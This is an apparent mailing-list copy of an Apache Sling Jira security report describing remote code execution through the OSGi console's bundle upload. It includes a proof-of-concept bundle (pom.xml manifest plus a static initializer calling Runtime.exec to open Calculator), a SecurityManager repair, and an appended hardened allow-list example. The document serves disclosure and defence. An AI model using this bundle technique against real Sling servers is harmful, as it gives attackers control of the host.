Posted to dev@sling.apache.org by "QSec-Team (Jira)" <ji...@apache.org> on 2022/11/02 12:53:00 UTC

[jira] [Closed] (SLING-11658) sling remote code execute

     [ https://issues.apache.org/jira/browse/SLING-11658?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]

QSec-Team closed SLING-11658.
-----------------------------

> sling remote code execute
> -------------------------
>
>                 Key: SLING-11658
>                 URL: https://issues.apache.org/jira/browse/SLING-11658
>             Project: Sling
>          Issue Type: Bug
>          Components: Console
>    Affects Versions: App CMS 1.1.2
>         Environment: OpenJDK Runtime Environment (Zulu 8.64.0.19-CA-macos-aarch64) (build 1.8.0_345-b01)
>            Reporter: QSec-Team
>            Priority: Major
>         Attachments: 1.png, 2.png
>
>
> h1. Utilization process
>  
> After logging in to Sling, the OSGi management function lets you obtain host control by uploading a bundle component package.
> !1.png!
>  
> After uploading the malicious bundle package constructed by the attacker, first click the "Refresh Package Imports" button and then the "start" button. This triggers loading of the bundle component, and the malicious code is executed.
> !2.png!
>  
> h1. Jar package construction:
>  
> Create a new Maven project and add the following compilation options in pom.xml:
> {code:java}
>    <build>
>         <plugins>
>             <plugin>
>                 <groupId>org.apache.maven.plugins</groupId>
>                 <artifactId>maven-assembly-plugin</artifactId>
>                 <configuration>
>                     <descriptorRefs>
>                         <descriptorRef>jar-with-dependencies</descriptorRef>
>                     </descriptorRefs>
>                     <archive>
>                         <manifestEntries>
>                             <Bundle-SymbolicName>shxjia</Bundle-SymbolicName>
>                             <Bundle-Activator>jsx.ink.Main</Bundle-Activator>
>                             <Bundle-Version>6.6.6</Bundle-Version>
>                         </manifestEntries>
>                     </archive>
>                 </configuration>
>             </plugin>
>         </plugins>
>     </build> {code}
> Create Main.java in the source code folder:
> Note that the "package jsx.ink;" declaration in the source code must correspond to the Bundle-Activator attribute in pom.xml.
> {code:java}
> package jsx.ink;
>
> public class Main {
>     // Static initializer: runs as soon as the framework loads the activator class.
>     static {
>         try {
>             Runtime.getRuntime().exec("/System/Applications/Calculator.app/Contents/MacOS/Calculator");
>         } catch (Exception e) {
>         }
>     }
>
>     public static void main(String[] args) {
>         System.out.println("Hello world!");
>     }
> }
> {code}
> After the code is written, enter the directory where pom.xml is located and use the maven command to package:
> {code:bash}
> mvn assembly:assembly -f pom.xml
> {code}
> h1. Repair
>  
> You can use a SecurityManager to restrict some operations.
> {code:java}
> import java.util.Arrays;
> import java.util.List;
>
> // Deny Runtime.exec for any program that is not on the allow-list.
> SecurityManager securityManager = new SecurityManager() {
>     @Override
>     public void checkExec(String cmd) {
>         // One list entry per command.
>         List<String> whiteList = Arrays.asList("whoami", "netstat");
>         if (!whiteList.contains(cmd)) {
>             throw new RuntimeException("command execute denied!");
>         }
>         super.checkExec(cmd);
>     }
> };
> System.setSecurityManager(securityManager);
> {code}



--
This message was sent by Atlassian Jira
(v8.20.10#820010)
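As an added example, not code from the issue or from Sling, the following hardens the checkExec idea from the "Repair" section: the allow-list holds canonical absolute paths rather than bare command names, and every denied launch is logged so bundle-driven exec attempts show up in the JVM's logs. The class name, the logger and the /usr/bin/whoami entry are assumptions; the denied path is the one from the issue's PoC.

```java
import java.io.File;
import java.io.IOException;
import java.util.HashSet;
import java.util.Set;
import java.util.logging.Logger;

// Added example: exec allow-list keyed on canonical absolute paths, with denials logged.
// SecurityManager is deprecated for removal since Java 17 (JEP 411); this targets the
// Java 8 runtime named in the issue.
public final class ExecAllowListSecurityManager extends SecurityManager {

    private static final Logger LOG =
            Logger.getLogger(ExecAllowListSecurityManager.class.getName());

    // Canonical paths of the only programs this JVM may start.
    private final Set<String> allowed = new HashSet<>();

    public ExecAllowListSecurityManager(String... allowedPrograms) throws IOException {
        for (String p : allowedPrograms) {
            allowed.add(new File(p).getCanonicalPath());
        }
    }

    // ProcessBuilder.start() calls this with the program (first token of the command
    // line) before the process is created.
    @Override
    public void checkExec(String cmd) {
        String canonical;
        try {
            // A bare name such as "whoami" resolves against the working directory, not
            // PATH, so only an absolute path on the allow-list can ever match.
            canonical = new File(cmd).getCanonicalPath();
        } catch (IOException e) {
            LOG.warning("exec denied (unresolvable path): " + cmd);
            throw new SecurityException("command execute denied: " + cmd);
        }
        if (!allowed.contains(canonical)) {
            LOG.warning("exec denied: " + cmd + " -> " + canonical);
            throw new SecurityException("command execute denied: " + cmd);
        }
        // super.checkExec would additionally require a FilePermission "execute" grant
        // from the installed java.policy; the allow-list is the sole decision here.
    }

    // Demo with constructed values: install the manager, then attempt the PoC's program.
    public static void main(String[] args) throws IOException {
        System.setSecurityManager(new ExecAllowListSecurityManager("/usr/bin/whoami"));
        try {
            Runtime.getRuntime().exec("/System/Applications/Calculator.app/Contents/MacOS/Calculator");
        } catch (SecurityException e) {
            System.out.println(e.getMessage());
        }
    }
}
```

This covers only process launch; a bundle installed through the console can still use any other JVM capability, so the console itself remains an administrator-only function.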